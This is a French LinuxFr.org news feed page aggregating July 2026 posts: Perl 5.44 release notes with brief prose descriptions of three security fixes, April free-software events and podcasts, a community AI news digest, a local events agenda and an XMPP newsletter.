Syndicate content
Mis à jour : il y a 1 heure 55 min

Perl 5.44 est sorti

23 juillet, 2026 - 10:53

Perl est un langage de programmation créé par Larry Wall en 1987 (Artistic License et GPL). La version 5.44.0 est parue le 15 juillet 2026. La précédente 5.42.0 était initialement parue en juillet 2025, avec un dernier correctif 5.42.2 publié en mars 2026.

Parmi les améliorations principales :

  • paramètres nommés dans les signatures
  • foreach avec plusieurs variables peuvent maintenant utiliser des alias de références
  • fonctionnement amélioré des motifs d’expressions régulières avec /xx
  • prise en charge d’Unicode 17.0
  • nouvelle source d’entropie pour l’initialisation du générateur de nombres pseudo-aléatoires

Mais aussi 3 correctifs sécurité, quelques incompatibilités, des améliorations de performances, de documentation, etc. Reportez-vous aux notes de version pour avoir tous les détails. La suite de la dépêche décrit les améliorations principales et les correctifs sécurité.

Améliorations principales Paramètres nommés dans les signatures

Cette version de Perl apporte la possibilité de passer des paramètres de fonction par paire nom/valeur plutôt que par position.

sub f ($x, $y, :$alpha, :$beta = undef) { ... } f( 123, 456, alpha => 789 );

Cette fonctionalité est considérée comme étant experimentale et est décrité en détail dans la partie "Signatures" de perlsub.

Les foreach avec plusieurs variables peuvent maintenant utiliser des alias de références

Perl version 5.22 avait apporté des alias à des références, permettant à la variable d’itération d’une boucle foreach de créer de nouveaux alias à une référence. Avec Perl 5.36, on pouvait itérer sur plusieurs variables à la fois dans une boucle foreach. Dans cette version de Perl, ces deux fonctionnalités peuvent être utilisées ensemble, ce qui permet d’avoir plusieurs variables d’itération, certaines pouvant être des alias de références.

use v5.44; use feature qw( refaliasing declared_refs ); my %hash = ( one => [1], two => [2, 2], ); foreach my ( $key, \@items ) ( %hash ) { say "The $key array contains: @items"; } Fonctionnement amélioré des motifs d’expressions régulières avec /xx

À titre expérimental, le modificateur de motif /xx permet aux classes de caractères (par exemple, [a-zA-Z]) de s’étendre sur plusieurs lignes et de contenir des commentaires ; il signale également les cas potentiels où une partie du motif a été interprétée comme un commentaire au lieu de l’interprétation voulue. Ce comportement est activé par la directive use feature "enhanced_xx". Voir la section « /x et /xx » dans la documentation perlre.

Prise en charge d’Unicode 17.0

Le support Unicode de Perl passe à la version 17.

Nouvelle source d’entropie pour l’initialisation du PRNG

Perl utilise désormais l’appel système getentropy() pour obtenir des octets aléatoires adaptés à l’initialisation de son PRNG interne. Auparavant, Perl lisait des octets bruts depuis le périphérique /dev/urandom. Perl procède désormais à cette initialisation dans l’ordre suivant (en passant à l’étape suivante en cas d’échec) :

  • getentropy() sur les systèmes prenant en charge cet appel (Linux, BSD, macOS)
  • /dev/urandom sur les systèmes qui en disposent
  • Une empreinte (hash) de variables d’état internes : temps Unix, identifiant de processus et valeur de pointeur

Notez que le PRNG interne ne convient toujours pas aux applications nécessitant une sécurité élevée. Consultez la section « rand EXPR » dans perlfunc pour les aspects liés à la sécurité.

Securité CVE-2026-8376 - Débordement de tampon dans Perl_study_chunk

La fonction Perl_study_chunk, située dans regcomp_study.c, vérifiait la taille du tampon de sous-chaîne concaténée en nombre de caractères plutôt qu’en octets. Dans une version 32 bits, ceci peut entraîner un débordement de tampon, provoquant des écritures hors limites.

CVE-2026-57432 - Débordement de tampon dans S_measure_struct

Si l’on appelle pack ou unpack pour traiter une structure dont la taille calculée est trop importante pour tenir en mémoire, un dépassement d’entier peut arriver et entraîner un débordement de tampon. Ce cas de figure se produit généralement lorsque l’on utilise un nombre élevé comme facteur de répétition pour un élément.

CVE-2026-13221 - Regex trie 16-bit field overflow

L’optimisation de type « trie » (arbre de recherche) du moteur d’expressions régulières pouvait subir un dépassement lors du traitement d’une alternance comportant plus de 65 000 branches. Cela pouvait entraîner à la fois des faux positifs et des faux négatifs pour ces expressions régulières.

Télécharger ce contenu au format EPUB

Commentaires : voir le flux Atom ouvrir dans le navigateur

L'April invite à participer à la « Fête des Possibles » 2026 pour toucher de nouveaux publics

22 juillet, 2026 - 09:22

Une nouvelle édition de la Fête des Possibles, initiée et coordonnée par le Collectif pour une Transition Citoyenne, aura lieu du 11 septembre au 11 octobre 2026. Des centaines d'événements seront organisés partout en France et en Belgique pour valoriser les actions concrètes en faveur d'un avenir plus durable et solidaire.

Le logiciel libre a toute sa place dans cette dynamique ! Ainsi, l'April, partenaire de la Fête des Possibles, invite les organisations locales de promotion du logiciel libre à proposer un voire plusieurs rendez-vous dans le cadre de cette initiative.

Comment participer ?
  • Si vous avez déjà prévu un événement autour du logiciel libre ou de la culture libre entre le 11 septembre et le 11 octobre, pensez à l'ajouter sur le site de la Fête des Possibles, en indiquant la thématique « Vivre et faire autrement » ;
  • Vous pouvez aussi proposer un rendez-vous ad hoc pour la Fête des Possibles ! Dans ce cas, n'hésitez pas à l'ajouter sur le site de l'initiative dès que vous connaissez la date, il sera toujours possible d'affiner la présentation plus tard ;​
  • Vous pouvez, sans doute aussi, vous « greffer » à un événement déjà prévu, en proposant à l'organisation de prévoir de la place pour de la sensibilisation au logiciel libre : vérifiez sur la carte des rendez-vous si des événements sont déjà programmés près de chez vous.
  • Votre événement se déroule en ligne ? Le formulaire de soumission permet de l’indiquer !
Le bon réflexe

N'oubliez pas d'inscrire votre événement également sur l'Agenda du Libre, en ajoutant le mot-clé fete-des-possibles-2026. Cela permettra à l'April de mettre en valeur la contribution des organisations locales de promotion du Libre à la Fête des Possibles

TacTic, une ASBL Tip Top - « Libre à vous ! » du 7 juillet 2026 - Podcasts et références

21 juillet, 2026 - 18:48

282ᵉ émission « Libre à vous ! » de l’April. Podcast et programme :

  • sujet principal : « Tactic, une ASBL Tip Top » (Association sans but non lucratif)
  • la chronique Le truc que (presque) personne n’a vraiment compris mais qui nous concerne toutes et tous de Benjamin Bellamy : « Conseils de lectures pour l’été »
  • la chronique Que libérer d’autre que du logiciel avec Antanak, sur « Les assises de l’attention » (rediffusion du 10 février 2026)

C'était la dernière émission de cette 9ᵉ saison de «  Libre à vous ! »

On se retrouve en septembre, sans doute le 8, pour une nouvelle saison.

Toujours en direct chaque mardi de 15 h 30 à 17 h sur 93,1 FM en Île‐de‐France et sur le site Web de la radio Cause Commune.

En attendant, si vous avez manqué une émission ou envie de réécouter un sujet qui vous a particulièrement plu, nous vous proposons cette page bien pratique qui regroupe l'ensemble des podcast, par émission et par sujet

Nous vous souhaitons bonne écoute et un très bel été

Télécharger ce contenu au format EPUB

Commentaires : voir le flux Atom ouvrir dans le navigateur

Revue de presse de l’April pour la semaine 29 de l’année 2026

20 juillet, 2026 - 11:32

Cette revue de presse sur Internet fait partie du travail de veille mené par l’April dans le cadre de son action de défense et de promotion du logiciel libre. Les positions exposées dans les articles sont celles de leurs auteurs et ne rejoignent pas forcément celles de l’April.

Appel à projets tuteurés colibre 2026-2027

18 juillet, 2026 - 19:51

Cette année encore (mais pour la dernière fois) la licence professionnelle en communication CoLibre, de l'Université Lyon2, vous invite à proposer une action de communication pour votre structure (association, collectif, entreprise…) qui fera l'objet d'un projet tuteuré pour un des groupes de notre promotion 2026-2027.

L'appel est ouvert jusqu'au 15 septembre (sans possibilité d'allongement).

Il est important de penser que l'action fera d'abord l'objet d'une étude de faisabilité et, dans la mesure du possible, sera réalisée par le groupe qui en a la charge.

Il faut garder en tête que les étudiantes et étudiants ne doivent utiliser que des logiciels libres pour réaliser leurs travaux et que par ailleurs tous les frais engagés doivent être pris en charge par l'offreur.

Par expérience, il est important que la structure soit en mesure de venir rencontrer le groupe ou le faire venir "en vrai", il faut aussi avoir une part de disponibilité pour une réunion mensuelle minimum avec le groupe et considérer le groupe comme force de proposition et pas seulement comme exécutant à pas cher d'une action de communication.

Le formulaire de proposition est disponible sur le site de la promotion tout comme des informations sur les projets tuteurés passés.

Télécharger ce contenu au format EPUB

Commentaires : voir le flux Atom ouvrir dans le navigateur

Podcast Projets Libres saison 4 épisode 21 : postmarketOS, Linux pour faire durer votre smartphone pendant 10 ans !

17 juillet, 2026 - 07:43

L'équipe de Projets Libres est ravie de vous présenter un épisode de la série sur la libération des smartphones, dédié à la distribution Linux mobile postmarketOS.
Dans ce long entretien avec Antoine Martin et Ranny Bergamotte, deux contributeurs de confiance du projet, nous abordons une variété de sujets :

  • l'histoire du projet
  • ses différentes composantes (système, environnements de bureau, etc)
  • son équipe
  • son organisation
  • sa gouvernance et ses évolutions actuelles
  • son rapport avec les différents projets upstream
  • son financement
  • son système de tests matériel distribué par internet (hardware-CI)

Nous remercions chaleureusement Ranny pour sa réécriture complète de la traduction anglaise.

Télécharger ce contenu au format EPUB

Commentaires : voir le flux Atom ouvrir dans le navigateur

Veille communautaire sur des intelligences artificielles du mois de mai 2026

14 juillet, 2026 - 17:56

La série de dépêches de LinuxFr.org sur la veille concernant des intelligences artificielles a repris depuis le 16 mai 2026 avec une nouvelle formule.

Cette série perpétue l’initiative de valoriser les contenus pertinents des contributrices et contributeurs de LinuxFr.org en rapport avec des IA tels que les dépêches, journaux et liens. L’ajout des synthèses de la plupart des articles de presse et des contributions de la communauté LinuxFr.org sont proposés être envisagé à terme, selon les disponibilités des bénévoles.


(Mème original : They're the same picture, captures d'écran de la série « The Office » (US), épisode « Search Committee » diffusé en 2011. Version Framamèmes dessinée en avril 2025 par Gee (CC-0).)

    Sommaire Avant-propos

    NB: si vous avez déjà pris connaissance de la première dếpêche «nouvelle formule»1 et que vous n’êtes pas intéressé(e) pour consulter les résultats définitifs du sondage sur la reprise de la série, vous pouvez aller directement à la partie «Quelques statistiques sur les contenus retenus»

    Cette dépêche est dédiée à la veille sur des intelligences artificielles2 faite par des contributions communautaires sur des contenus de LinuxFr.org et reprend une partie de l’initiative amorcée par la série « Nouvelles sur l’IA »3 qui s’est arrêtée le 6 avril 20264 5.

    Comme recenser au fil de l’eau du contenu communautaire pertinent demande un travail conséquent pour la rédaction de la dépêche, la décision de continuer la série sous une nouvelle formule a été faite à la vue des résultats d’un sondage publié le 1er mai 2026.6 7

    La première dépêche de la série publiée le 16 mai 20261 a été primée comme meilleure contribution de mai 2026 par l’équipe de LinuxFr.org8.

    Méthodologie de sélection des contenus communautaires

    Comme dans la précédente série des « Nouvelles sur l’IA », les contenus communautaires sont répertoriés selon ces deux critères :

    • La présence d’une étiquette intelligence_artificielle9 (indication d’un rapport avec le thème de la dépêche)
    • Un score strictement supérieur à zéro au moment du recensement

    Certains contenus non recensés en raison du second critère peuvent être visualisés en s’aidant de la recherche par étiquette9.

    Quelques statistiques sur les contenus retenus

    Du 1er mai au 31 mai, les contenus retenus sont:

    • 4 dépêches
    • 13 journaux
    • 2 posts de forum
    • 1 sujet de suivi
    • 70 liens

    Au total, 90 contenus répondant aux critères de sélection sont recensés dans la présente dépêche.

    Focus sur…

    Dans cette seconde dépêche, des synthèses10 sont proposées sur les sujets concernant l’incidence de l’IA générative sur les visites de site web et la détection des deepfakes.

    L’incidence de l’IA générative sur les visites de site web

    Le lien suivant est un article provenant de la communauté francophone de Minecraft :

    Elle est relayée par Benoît Sibaud car elle fait écho à la situation qu’a subi LinuxFr.org avec les activités des bots IA.

    L’équipe du site Minecraft.fr a constaté une situation paradoxale depuis la concurrence des plaformes d’IA générative grand public avec des moteurs de recherche conventionnels. D’un côté, les statistiques de recherche par mot clé mise à disposition indique une augmentation des apparitions de Minecraft.fr dans les réponses aux requêtes. D’un autre côté, la fréquentation effective du site par des utilisateurs a diminué, ce qui occasionne une perte de recette du site par la publicité ciblée.

    L’équipe de Minecraft incrimine la fonction de résumé de texte par des IA génératives grand public comme responsable de la baisse des recettes publicitaires couplés à une hausse des charges due aux scannages du site par des bots IA.

    La détection des deepfakes

    Le lien suivant est un article provenant de la revue scientifique américaine Science:

    L’article en ligne retrace les travaux11 de Hany Farid, un enseignant-chercheur de l’Université de Berkeley qui s’était distingué pour établir l’authenticité d’une vidéo sur l’attaque par erreur d’une école primaire en Iran par l’armée américaine durant l’opération Epic Fury en février 2026.

    L’enseignant-chercheur détaille certaines techniques, la plupart manuelles mais relativement simples, qui s’appuient sur les défauts des IA génératives. Parmi celles-ci, l’usage des lignes de fuite pour vérifier la cohérence des images permet de détecter de manière efficace la plupart des deepfakes.

    Vers la fin de l’article du magazine, l’enseignant-chercheur confie sa difficulté croissante à analyser les vidéos suspectes suite à l’explosion du nombre de deepfakes fabriqués et avertit que son savoir-faire, bien qu’il contribue à compliquer la tâche de la plupart des acteurs malveillants, ne permettrait pas de détecter du faux contenu à 100%.

    Une sélection des contenus par thème

    Les thèmes ci-dessous sont proposés pour aider des lectrices et des lecteurs à retrouver les contenus qui les intéressent. Les thèmes sont pour le moment suggérés manuellement par des contributrices et des contributeurs à la dépêche.10

    Campus IA et Choose France Liens Centres de donnée Liens Communauté de LinuxFr.org Journaux Forum Suivi Cybersécurité Liens Éducation Lien Économie et droit Journal Liens Environnement Liens Internet mort Liens Mondes artistiques et culturels Lien Logiciels libres Liens Jeux vidéos Journal Programmation Journaux Forum Liens Recherche scientifique Liens Religion Liens Retour d’expérience Forum Revues de presse Revue de presse de LinuxFr.org Revue de presse de l’April Santé Liens Société Journaux Liens Souveraineté Journaux Liens Annexe Contenus recensés par ordre chronologique

    Ci-dessous sont rassemblés des contenus sélectionnés dans l’ordre chronologique, dont une partie qui n’ont pas été classés parmi les thèmes.

    Dépêches Journaux Forum Suivi Liens Source de la première illustration en haut de la dépêche

    L’illustration a été créée depuis un modèle de framamème12 13 en licence CC014, avec l’assistance de Krita.

    En complément, afin de remercier les lectrices et lecteurs qui ont pu prendre connaissance de l’ensemble de la dépêche, nous vous proposons la montée de l’IA (pour « Intelligence Aviaire ») vue par Cepper, une cousine germaine de Pepper15 16 :

    1. https://linuxfr.org/news/veille-communautaire-sur-des-intelligences-artificielles-du-mois-d-avril-2026 

    2. Le terme « intelligence artificielle » regroupe en fait plusieurs définitions qui n’ont pas toujours fait consensus. Voir la page wikipédia sur leur définition et les techniques associées pour plus de précisions. 

    3. L’ensemble des « Nouvelles sur l’IA » sont accessibles avec le tag dédié nouvelles_sur_l_ia 

    4. La dernière dépêche de la série est consultable sur https://linuxfr.org/news/nouvelles-sur-l-ia-de-mars-2026 

    5. Le contributeur Moonz< a motivé son arrêt de la série de dépêche par le commentaire https://linuxfr.org/news/nouvelles-sur-l-ia-de-mars-2026#comment-2018598 

    6. À la clôture du sondage le 24 mai 2026 à 20h10 CEST, 55.4 % de vote sont favorables à la reprise de la série; 17.6 % de votes défavorables, 7.9 % de votes indécis, et 19.1 % de votes « pas vraiment sérieux ». Pour plus de détails, rendez-vous sur le sondage correspondant 

    7. Sur les 55.4 % de votes favorables à la reprise de la série, 70.5 % de votes viennent pour la réponse « Oui, même en l’absence de la synthèse des articles » et 29.5 % de votes pour la réponse « Oui, à condition de continuer la synthèse d’une partie des articles ». 

    8. https://linuxfr.org/news/meilleures-contributions-linuxfr-org-les-primees-de-mai-2026 

    9. Le lien de recherche par le tag dédiée est https://linuxfr.org/tags/intelligence_artificielle/public 

    10. La présente dépêche ne fait pas appel à des grands modèles de langage à cause de l’impopularité de ces outils parmi le public de LinuxFr.org pour la rédaction des articles. Voir le sondage suivant pour se faire une idée : https://linuxfr.org/sondages/faut-il-accepter-les-contenus-generes-par-ia-sur-linuxfr-org 

    11. Distinguishing Authentic from AI-Generated Explosions using Spatiotemporal Dynamics 

    12. Un générateur de mème proposé par Framasoft : https://framamemes.org/ 

    13. Modèle utilisé : They're the same picture 

    14. Voir cette notice explicative : https://creativecommons.org/publicdomain/zero/1.0/deed.fr 

    15. Un personnage provenant de la BD en ligne libre Pepper & Carrot 

    16. Des informations détaillées concernant la BD originelle sont consignées sur Wikipédia 

    Télécharger ce contenu au format EPUB

    Commentaires : voir le flux Atom ouvrir dans le navigateur

    Revue de presse de l’April pour la semaine 28 de l’année 2026

    14 juillet, 2026 - 13:24

    Cette revue de presse sur Internet fait partie du travail de veille mené par l’April dans le cadre de son action de défense et de promotion du logiciel libre. Les positions exposées dans les articles sont celles de leurs auteurs et ne rejoignent pas forcément celles de l’April.

    Agenda du Libre pour la semaine 29 de l'année 2026

    12 juillet, 2026 - 10:38

    Calendrier Web, regroupant des événements liés au Libre (logiciel, salon, atelier, install party, conférence) annoncés par leurs organisateurs. Voici un récapitulatif de la semaine à venir. Le détail de chacun de ces 28 événements (France: 22, Québec:5, Internet: 1) est en seconde partie de dépêche.

    Sommaire [FR Saint Clar] Tous les Lundis, médiathèque de Saint Clar – Le lundi 13 juillet 2026 de 10h00 à 17h00.

    Tous les lundis de 10h à 17h sans interruption, l’association Prends-toi en main / atelier abcpc, propose install party, suivi, dépannage, formation et revalorisation à petit prix sous Linux exclusivement.

    L’atelier abcpc existe depuis plus de 10 ans et milite exclusivement pour les logiciels libres.

    [FR Saint-Étienne] Permanence de l’association Alolise – Le lundi 13 juillet 2026 de 19h00 à 22h00.

    Tous les lundis soir de 19h à 22h (hors jours fériés) à la Bricoleuse.

    Rencontrer les bénévoles, poser des questions sur le libre ou l’informatique, les logiciels, l’hébergement, passer de Windows à Linux.

    Pour passer votre ordinateur sous Linux, nous vous invitons à nous prévenir avant votre passage: contact@alolise.org.

    [FR Montpellier] Permanence | Wikipermanence – Le lundi 13 juillet 2026 de 19h00 à 22h00.

    Une Wikipermanence est une rencontre physique entre des Wikipédiens chevronnés et de nouveaux ou futurs Wikipédiens qui souhaitent acquérir des connaissances et des conseils sur le fonctionnement de Wikipédia.

    Il ne s’agit pas d’une simple rencontre entre Wikipédiens : la Wikipermanence organisée par le groupe local de Montpellier est là pour répondre aux questions, permettre des démonstrations, offrir une aide aux premiers pas et permettre un suivi.

    Pour cette soirée, chacun amène ce qu’il veut à manger et à boire pour un repas partagé.

    Cette rencontre nous permettra d’aborder les sujets suivants :

    Le programme :

    • Information sur la communauté Wikipédia ;
    • Initiation des débutants ;
    • Nous contribuerons sur la mise à jour des différentes pages, sur les Wikipermanences que Montpel’libre organise à Montpellier ;
    • Atelier d’écriture ;
    • Échanger d’expériences ;
    • Proposition d’éditathon ;
    • Contributions libres ; *…et tout simplement, passer un moment convivial.

    Si vous avez des propositions, n’hésitez pas à compléter la page dédiée sur Wikipédia.

    N’hésitez pas à venir: c’est sans inscription, et vous l’aurez deviné, libre et gratuit !

    Wikipédia est une encyclopédie libre rédigée collaborativement par des milliers d’internautes. Mais, saviez-vous que vous pouviez y participer ?

    En apportant des connaissances, en créant ou améliorant des articles, en prenant des photos, ou simplement en corrigeant des fautes, vous pouvez contribuer à ce grand projet d’encyclopédie collaborative.

    Alors, venez participer aux rendez-vous des Wikipermanences de Montpellier qui auront lieu à l’Atelier de Pigistes, le deuxième lundi de chaque mois, de 19h00 à 22h00.

    Cet événement vous est proposé dans le cadre du partenariat qui lie le Club de la Presse, Wikimédia France, Wikimedia Foundation, Wikimedia Éducationet Montpel’libre.

    Inscription | GPS 43.60302/3.89809

    https://montpellibre.fr/fiches_activites/Fiche_010_Montpellibre_Permanence_Wikipermanence_Cabalherault.pdf

    [FR Sainte-Hélène] Cours gratuits d’Espéranto + Visio – Le lundi 13 juillet 2026 de 19h30 à 21h30.

    Saluton,

    Je vous propose des cours d’espéranto gratuits qui débuteront le lundi 8 juin à Sainte-Hélène dans le Médoc et qui sera également disponible en visioconférence.
    Le cours est destiné aux apprenants francophones de France et d’ailleurs.

    L’espéranto est plus qu’une langue neutre et très facile, mais aussi une langue fraternelle et libre qui permet de voyager dans de nombreux pays avec des facilités d’hébergement ou de fraterniser avec des personnes du monde entier.
    Vous trouverez plus d’informations sur la page Wikipédia, le site Espéranto-Gironde ou en visualisant le documentaire "ESPÉRANTO: de la genèse à la conquête de l’Europe"

    Les cours ont lieu le lundi soir de 19h30 à 21h30 sur environ 10 soirs pour réaliser les 10 leçons. Ces leçons complèteront les cours papier ou d’application telle que Duolingo.
    Début: lundi 8 juin 2026.
    Les cours sont GRATUITS pour tous.

    Le cours est en présentiel à Sainte-Hélène (33480) au foyer des sociétés en collaboration avec l’association l’Écurieux, ainsi qu’en distanciel / visioconférence.
    Ce cours est gratuit pour tous, en présentiel ou en distanciel.

    Nous pourrons organiser à la suite du cours, des rencontres avec les espérantistes de Bordeaux, du pays basque… afin de pratiquer en situation réelle.

    N’hésitez pas à nous contacter par téléphone au 0688350981 (appel, SMS, Signal) pour plus d’informations ou pour vous inscrire.

    Vivu Esperanto kaj Ĝis la revido.

    [CA-QC Trois-Rivières] 5 à 9 Hybride Linux à Trois-Rivières – Le lundi 13 juillet 2026 de 17h00 à 20h00.

    Synergies GULL/Restos du Cœur - « Libre à vous ! » du 30 juin 2026 - Podcasts et références

    10 juillet, 2026 - 16:23

    281ème émission Libre à vous ! de l’April. Podcast et programme :

    • sujet principal : synergies GULL/Restos du Cœur : l’expérience dans le Loiret avec Cenabumix, avec Jean Carratala et Pierre Meunier-Sirven
    • la chronique La pituite de Luk sur « Problème : climat et calculs »
    • la chronique F/H/X de Florence Chabanois sur « Entraînée à discriminer »

    Rendez‑vous en direct chaque mardi de 15 h 30 à 17 h sur 93,1 FM en Île‑de‑France. L’émission est diffusée simultanément sur le site Web de la radio Cause Commune.

    Vous pouvez laisser un message sur le répondeur de la radio, pour réagir à l’un des sujets de l’émission ou poser une question. Le numéro du répondeur : +33 9 72 51 55 46.

    Télécharger ce contenu au format EPUB

    Commentaires : voir le flux Atom ouvrir dans le navigateur

    Nouveautés de juillet 2026 de la communauté Scenari

    10 juillet, 2026 - 14:50

    Scenari est un ensemble de logiciels open source dédiés à la production collaborative, publication et diffusion de documents multi-support. Vous rédigez une seule fois votre contenu et vous pouvez les générer sous plusieurs formes : site web, PDF, OpenDocument, diaporama, paquet SCORM (Sharable Content Object Reference Model)… Vous ne vous concentrez que sur le contenu et l’outil se charge de créer un rendu professionnel accessible et responsive (qui s’adapte à la taille de l’écran).

    À chaque métier/contexte son modèle Scenari :

    • Opale pour la formation 
    • Dokiel pour la documentation 
    • Optim pour les présentations génériques 
    • Topaze pour les études de cas 
    • Parcours pour créer des scénarios de formation 
    Sommaire

    Lettre d'information XMPP de mai 2026

    9 juillet, 2026 - 17:33

    N. D. T. — Ceci est une traduction de la lettre d’information publiée régulièrement par l’équipe de communication de la XSF, essayant de conserver les tournures de phrase et l’esprit de l’original. Elle est réalisée et publiée conjointement sur les sites XMPP.org et LinuxFr.org selon une procédure définie.

    Bienvenue dans la lettre d'information XMPP, ravi de vous retrouver ! Ce numéro couvre le mois de mai 2026.

    La lettre d'information XMPP vous est proposée par l'Équipe de communication de la XSF.

    Comme tout autre projet accompli par la XSF, la lettre d'information est le résultat du travail volontaire de ses membres et des personnes y contribuant. Si vous êtes satisfait des services et logiciels que vous utilisez peut-être, n'hésitez pas à dire merci ou aider ces projets.

    Vous souhaitez contribuer à l'équipe de communication de la XSF ? Lisez en bas de page.

      Sommaire Annonces de la XSF 29e Sommet XMPP

      La XSF (XMPP Standards Foundation) est ravie d'annoncer le 29ème Sommet XMPP, le tout premier Sommet XMPP à se dérouler entièrement en ligne ! Le Sommet XMPP se tiendra du vendredi 4 septembre au samedi 5 septembre 2026, de 13h00 à 16h00 UTC les deux jours. La XSF invite toute personne intéressée par le développement des technologies XMPP à y participer et à discuter de tout ce qui touche à XMPP à distance !

      Évènements XMPP
      • Sprint XMPP à Berlin (DE / EN) : ça se déroulera en juin, du vendredi 19 au dimanche 21 juin 2026, dans les bureaux de Wikimedia Deutschland e.V. à Berlin, en Allemagne. Si cet événement vous intéresse, venez nous rejoindre ! Pensez simplement à vous inscrire ici, afin que nous sachions combien de personnes seront présentes pour organiser cela au mieux. Si vous avez des questions ou interrogations, rejoignez-nous sur le salon de discussion : sprints@muc.xmpp.org !

      • XMPP à FOSSY 2026 : l'édition de cette année de FOSSY, la quatrième conférence Free and Open Source Software Yearly, se tiendra au mois d'août, du jeudi 6 au dimanche 9 août 2026 à l'Université de la Colombie-Britannique, à Vancouver, au Canada. Comme toujours, il y aura une thématique XMPP. L'appel à propositions est clos depuis le 2 juin 2026. Cette année encore, JMP a le plaisir de renouveler son offre annuelle de financement pour les intervenants qui souhaiteraient animer une présentation sur la thématique XMPP.

      Vidéos et conférences XMPP Articles XMPP Nouvelles des logiciels XMPP Clients et Applications XMPP
      • aTalk a publié les versions 5.4.0, 5.5.0 et 6.0.0 de sa messagerie instantanée chiffrée avec appels vidéo et fonctionnalités GPS pour Android. Ces versions apportent de nombreux changements "sous le capot". Veuillez consulter les notes de mise à jour pour tous les détails.

      • Conversations a publié les versions 2.19.16 et 2.20.0 pour Android. Ces versions apportent une révision importante de l'interface utilisateur, un navigateur de médias amélioré permettant de partager et de supprimer des fichiers média, le stockage des médias en interne par défaut (avec un paramètre pour les enregistrer automatiquement dans la galerie), l'envoi immédiat des enregistrements audio au lieu de les attacher en pièce jointe (plus un paramètre pour rétablir l'ancien comportement), l'option Afficher le code QR qui inclut désormais le paramètre de pré-authentification sur les serveurs avec invitations simplifiées, ainsi qu'une barre de recherche pour accéder plus facilement aux recherches depuis l'écran d'accueil. N'oubliez pas de consulter le journal des modifications pour tous les détails !

      • Converse.js a publié les versions 13.0.0 et 13.0.1 de son client de chat XMPP open source basé sur le Web, avec divers ajouts, améliorations et corrections de bogues. Ces versions ajoutent la prise en charge des réactions aux messages permettant aux utilisateurs de réagir aux messages avec des emojis, les réponses aux messages à des messages spécifiques, la saisie semi-automatique des fournisseurs XMPP possibles lors de la création d’un nouveau compte, une demi-douzaine de corrections et pas mal de travail en coulisses ! Rendez-vous sur le journal des modifications pour tous les détails !

      • Monal a publié la version 6.4.21 pour iOS et macOS. Cette version affiche désormais la date et l'heure de la dernière utilisation des clés OMEMO, améliore la précision du partage de position et les horodatages de la dernière activité des contacts, et corrige également plusieurs bugs !

      • Monocles a publié les versions 2.1.6 et 2.2, 2.2.1 et 2.2.2 de son client de chat pour Android. Ces versions introduisent un grand nombre de nouvelles fonctionnalités, d’améliorations et de corrections de bogues, bien trop nombreuses pour être toutes répertoriées ici. Parmi les nouveautés les plus marquantes, vous trouverez les messages éphémères, le partage de position en temps réel, la création et la restauration améliorées des sauvegardes, l’utilisation par défaut du stockage interne caché, le chiffrement de la base de données locale, l’amélioration du chiffrement et de la fiabilité des sauvegardes, la suppression sécurisée et la récupération après migration, des améliorations de l’interface utilisateur et de l’expérience utilisateur, une galerie multimédia, et bien plus encore ! N’hésitez pas à consulter les liens pour obtenir tous les détails ! Remarque : en raison de certains retards dans les mises à jour du Play Store, ces versions ne sont pour l’instant disponibles que via F-droid.

      • Poezio a publié la version 0.18 de son client console pour XMPP. Cette nouvelle version apporte principalement des améliorations internes, ainsi que quelques nouvelles fonctionnalités telles que la rétraction des messages côté expéditeur, diverses améliorations du plugin react, notamment un moyen de convertir les codes courts :emoji: en véritables emojis, et une nouvelle façon d’afficher ou de masquer les présences dans les discussions de groupe, ainsi que quelques autres améliorations et corrections. Vous trouverez tous les détails dans le lien vers la note de mise à jour.

      • Profanity a publié la version 0.18.1 de son client XMPP en ligne de commande. Cette version apporte des corrections de bogues liés à la connexion à une ressource vide, résout des problèmes avec l’éditeur asynchrone, corrige les échecs de migration de la base de données et rétablit les demandes d’accusé de réception des messages lorsque les capacités sont inconnues, entre autres. N’oubliez pas de consulter le journal des modifications pour tous les détails !

      Serveurs XMPP
      • MongooseIM a publié MongooseIM 6.7.0 avec plus d'ajouts, de changements et de corrections de bugs que ce que nous pouvons raisonnablement énumérer ici ! Assurez-vous de lire le journal des modifications pour tous les détails !

      • La communauté Ignite Realtime a le plaisir d'annoncer la sortie d'Openfire 5.0.5. Le journal complet des modifications fournit plus de détails, notamment sur les corrections de bogues et les mises à jour des bibliothèques intégrées, tandis que l'équipe continue de travailler sur la prochaine version 5.1.0, qui apportera de nouvelles fonctionnalités.

      • Prosody IM a le plaisir d’annoncer la version 13.0.6, une nouvelle version mineure issue de la branche stable. Cette version corrige quelques bogues qui ont été découverts et corrigés depuis la version 13.0.5. La plupart de ces corrections sont mineures, mais certaines sont importantes. N’hésitez pas à consulter le journal des modifications pour plus de détails !

      Bibliothèques et outils XMPP Extensions et spécifications

      La XMPP Standards Foundation développe des extensions à XMPP dans sa série de XEP en plus des RFC XMPP. Des développeuses, développeurs et autres personnes expertes en normes du monde entier collaborent à ces extensions, élaborant de nouvelles spécifications pour les pratiques émergentes et affinant les méthodes existantes. Proposées par n'importe qui, celles qui remportent le plus de succès finissent par être classées comme finales ou actives, selon leur type, tandis que les autres sont soigneusement archivées comme différées. Ce cycle de vie est décrit dans la XEP-0001, qui contient les définitions formelles et canoniques des types, des états et des processus. Vous pouvez en savoir plus sur le processus de normalisation ici. La communication autour des normes et des extensions se fait via la liste de diffusion des normes (archives en ligne).

      Extensions proposées

      Le processus de développement d'une XEP commence par la rédaction d'une idée et sa soumission à l'éditeur XMPP. Dans un délai de deux semaines, le Conseil décide d'accepter ou non cette proposition en tant que XEP expérimentale.

      Nouvelles extensions
      • Pas de nouvelle XEP ce mois-ci.
      Extensions déférées

      Si une XEP expérimentale n’est pas mise à jour pendant plus de douze mois, elle sera retirée de la catégorie Expérimentale pour être classée comme Déférée. Si une mise à jour intervient, la XEP sera replacée dans la catégorie Expérimentale.

      • Pas de XEP déférée ce mois-ci.
      Extensions mises à jour
      • Version 0.2.0 de XEP-0449 (Autocollants)
        • Définir explicitement l'attribut « pack » comme MAY. Ajouter plus de détails sur l'envoi et la réception d'autocollants sans pack d'autocollants. (lmw)
      • Version 0.2.0 de XEP-0463 (Gestion des versions des affiliations MUC)
        • Utilisation d’un élément enfant dédié de <x/> plutôt que d’attributs avec espace de noms. (lmw)
      • Version 0.3.0 de XEP-0503 (Espaces côté serveur)
        • Correction du nom du champ du nœud pubsub dans les informations de disco de la salle.
        • Préciser comment associer des images (avatar et bannière) à un espace. (nc)
      Dernier appel

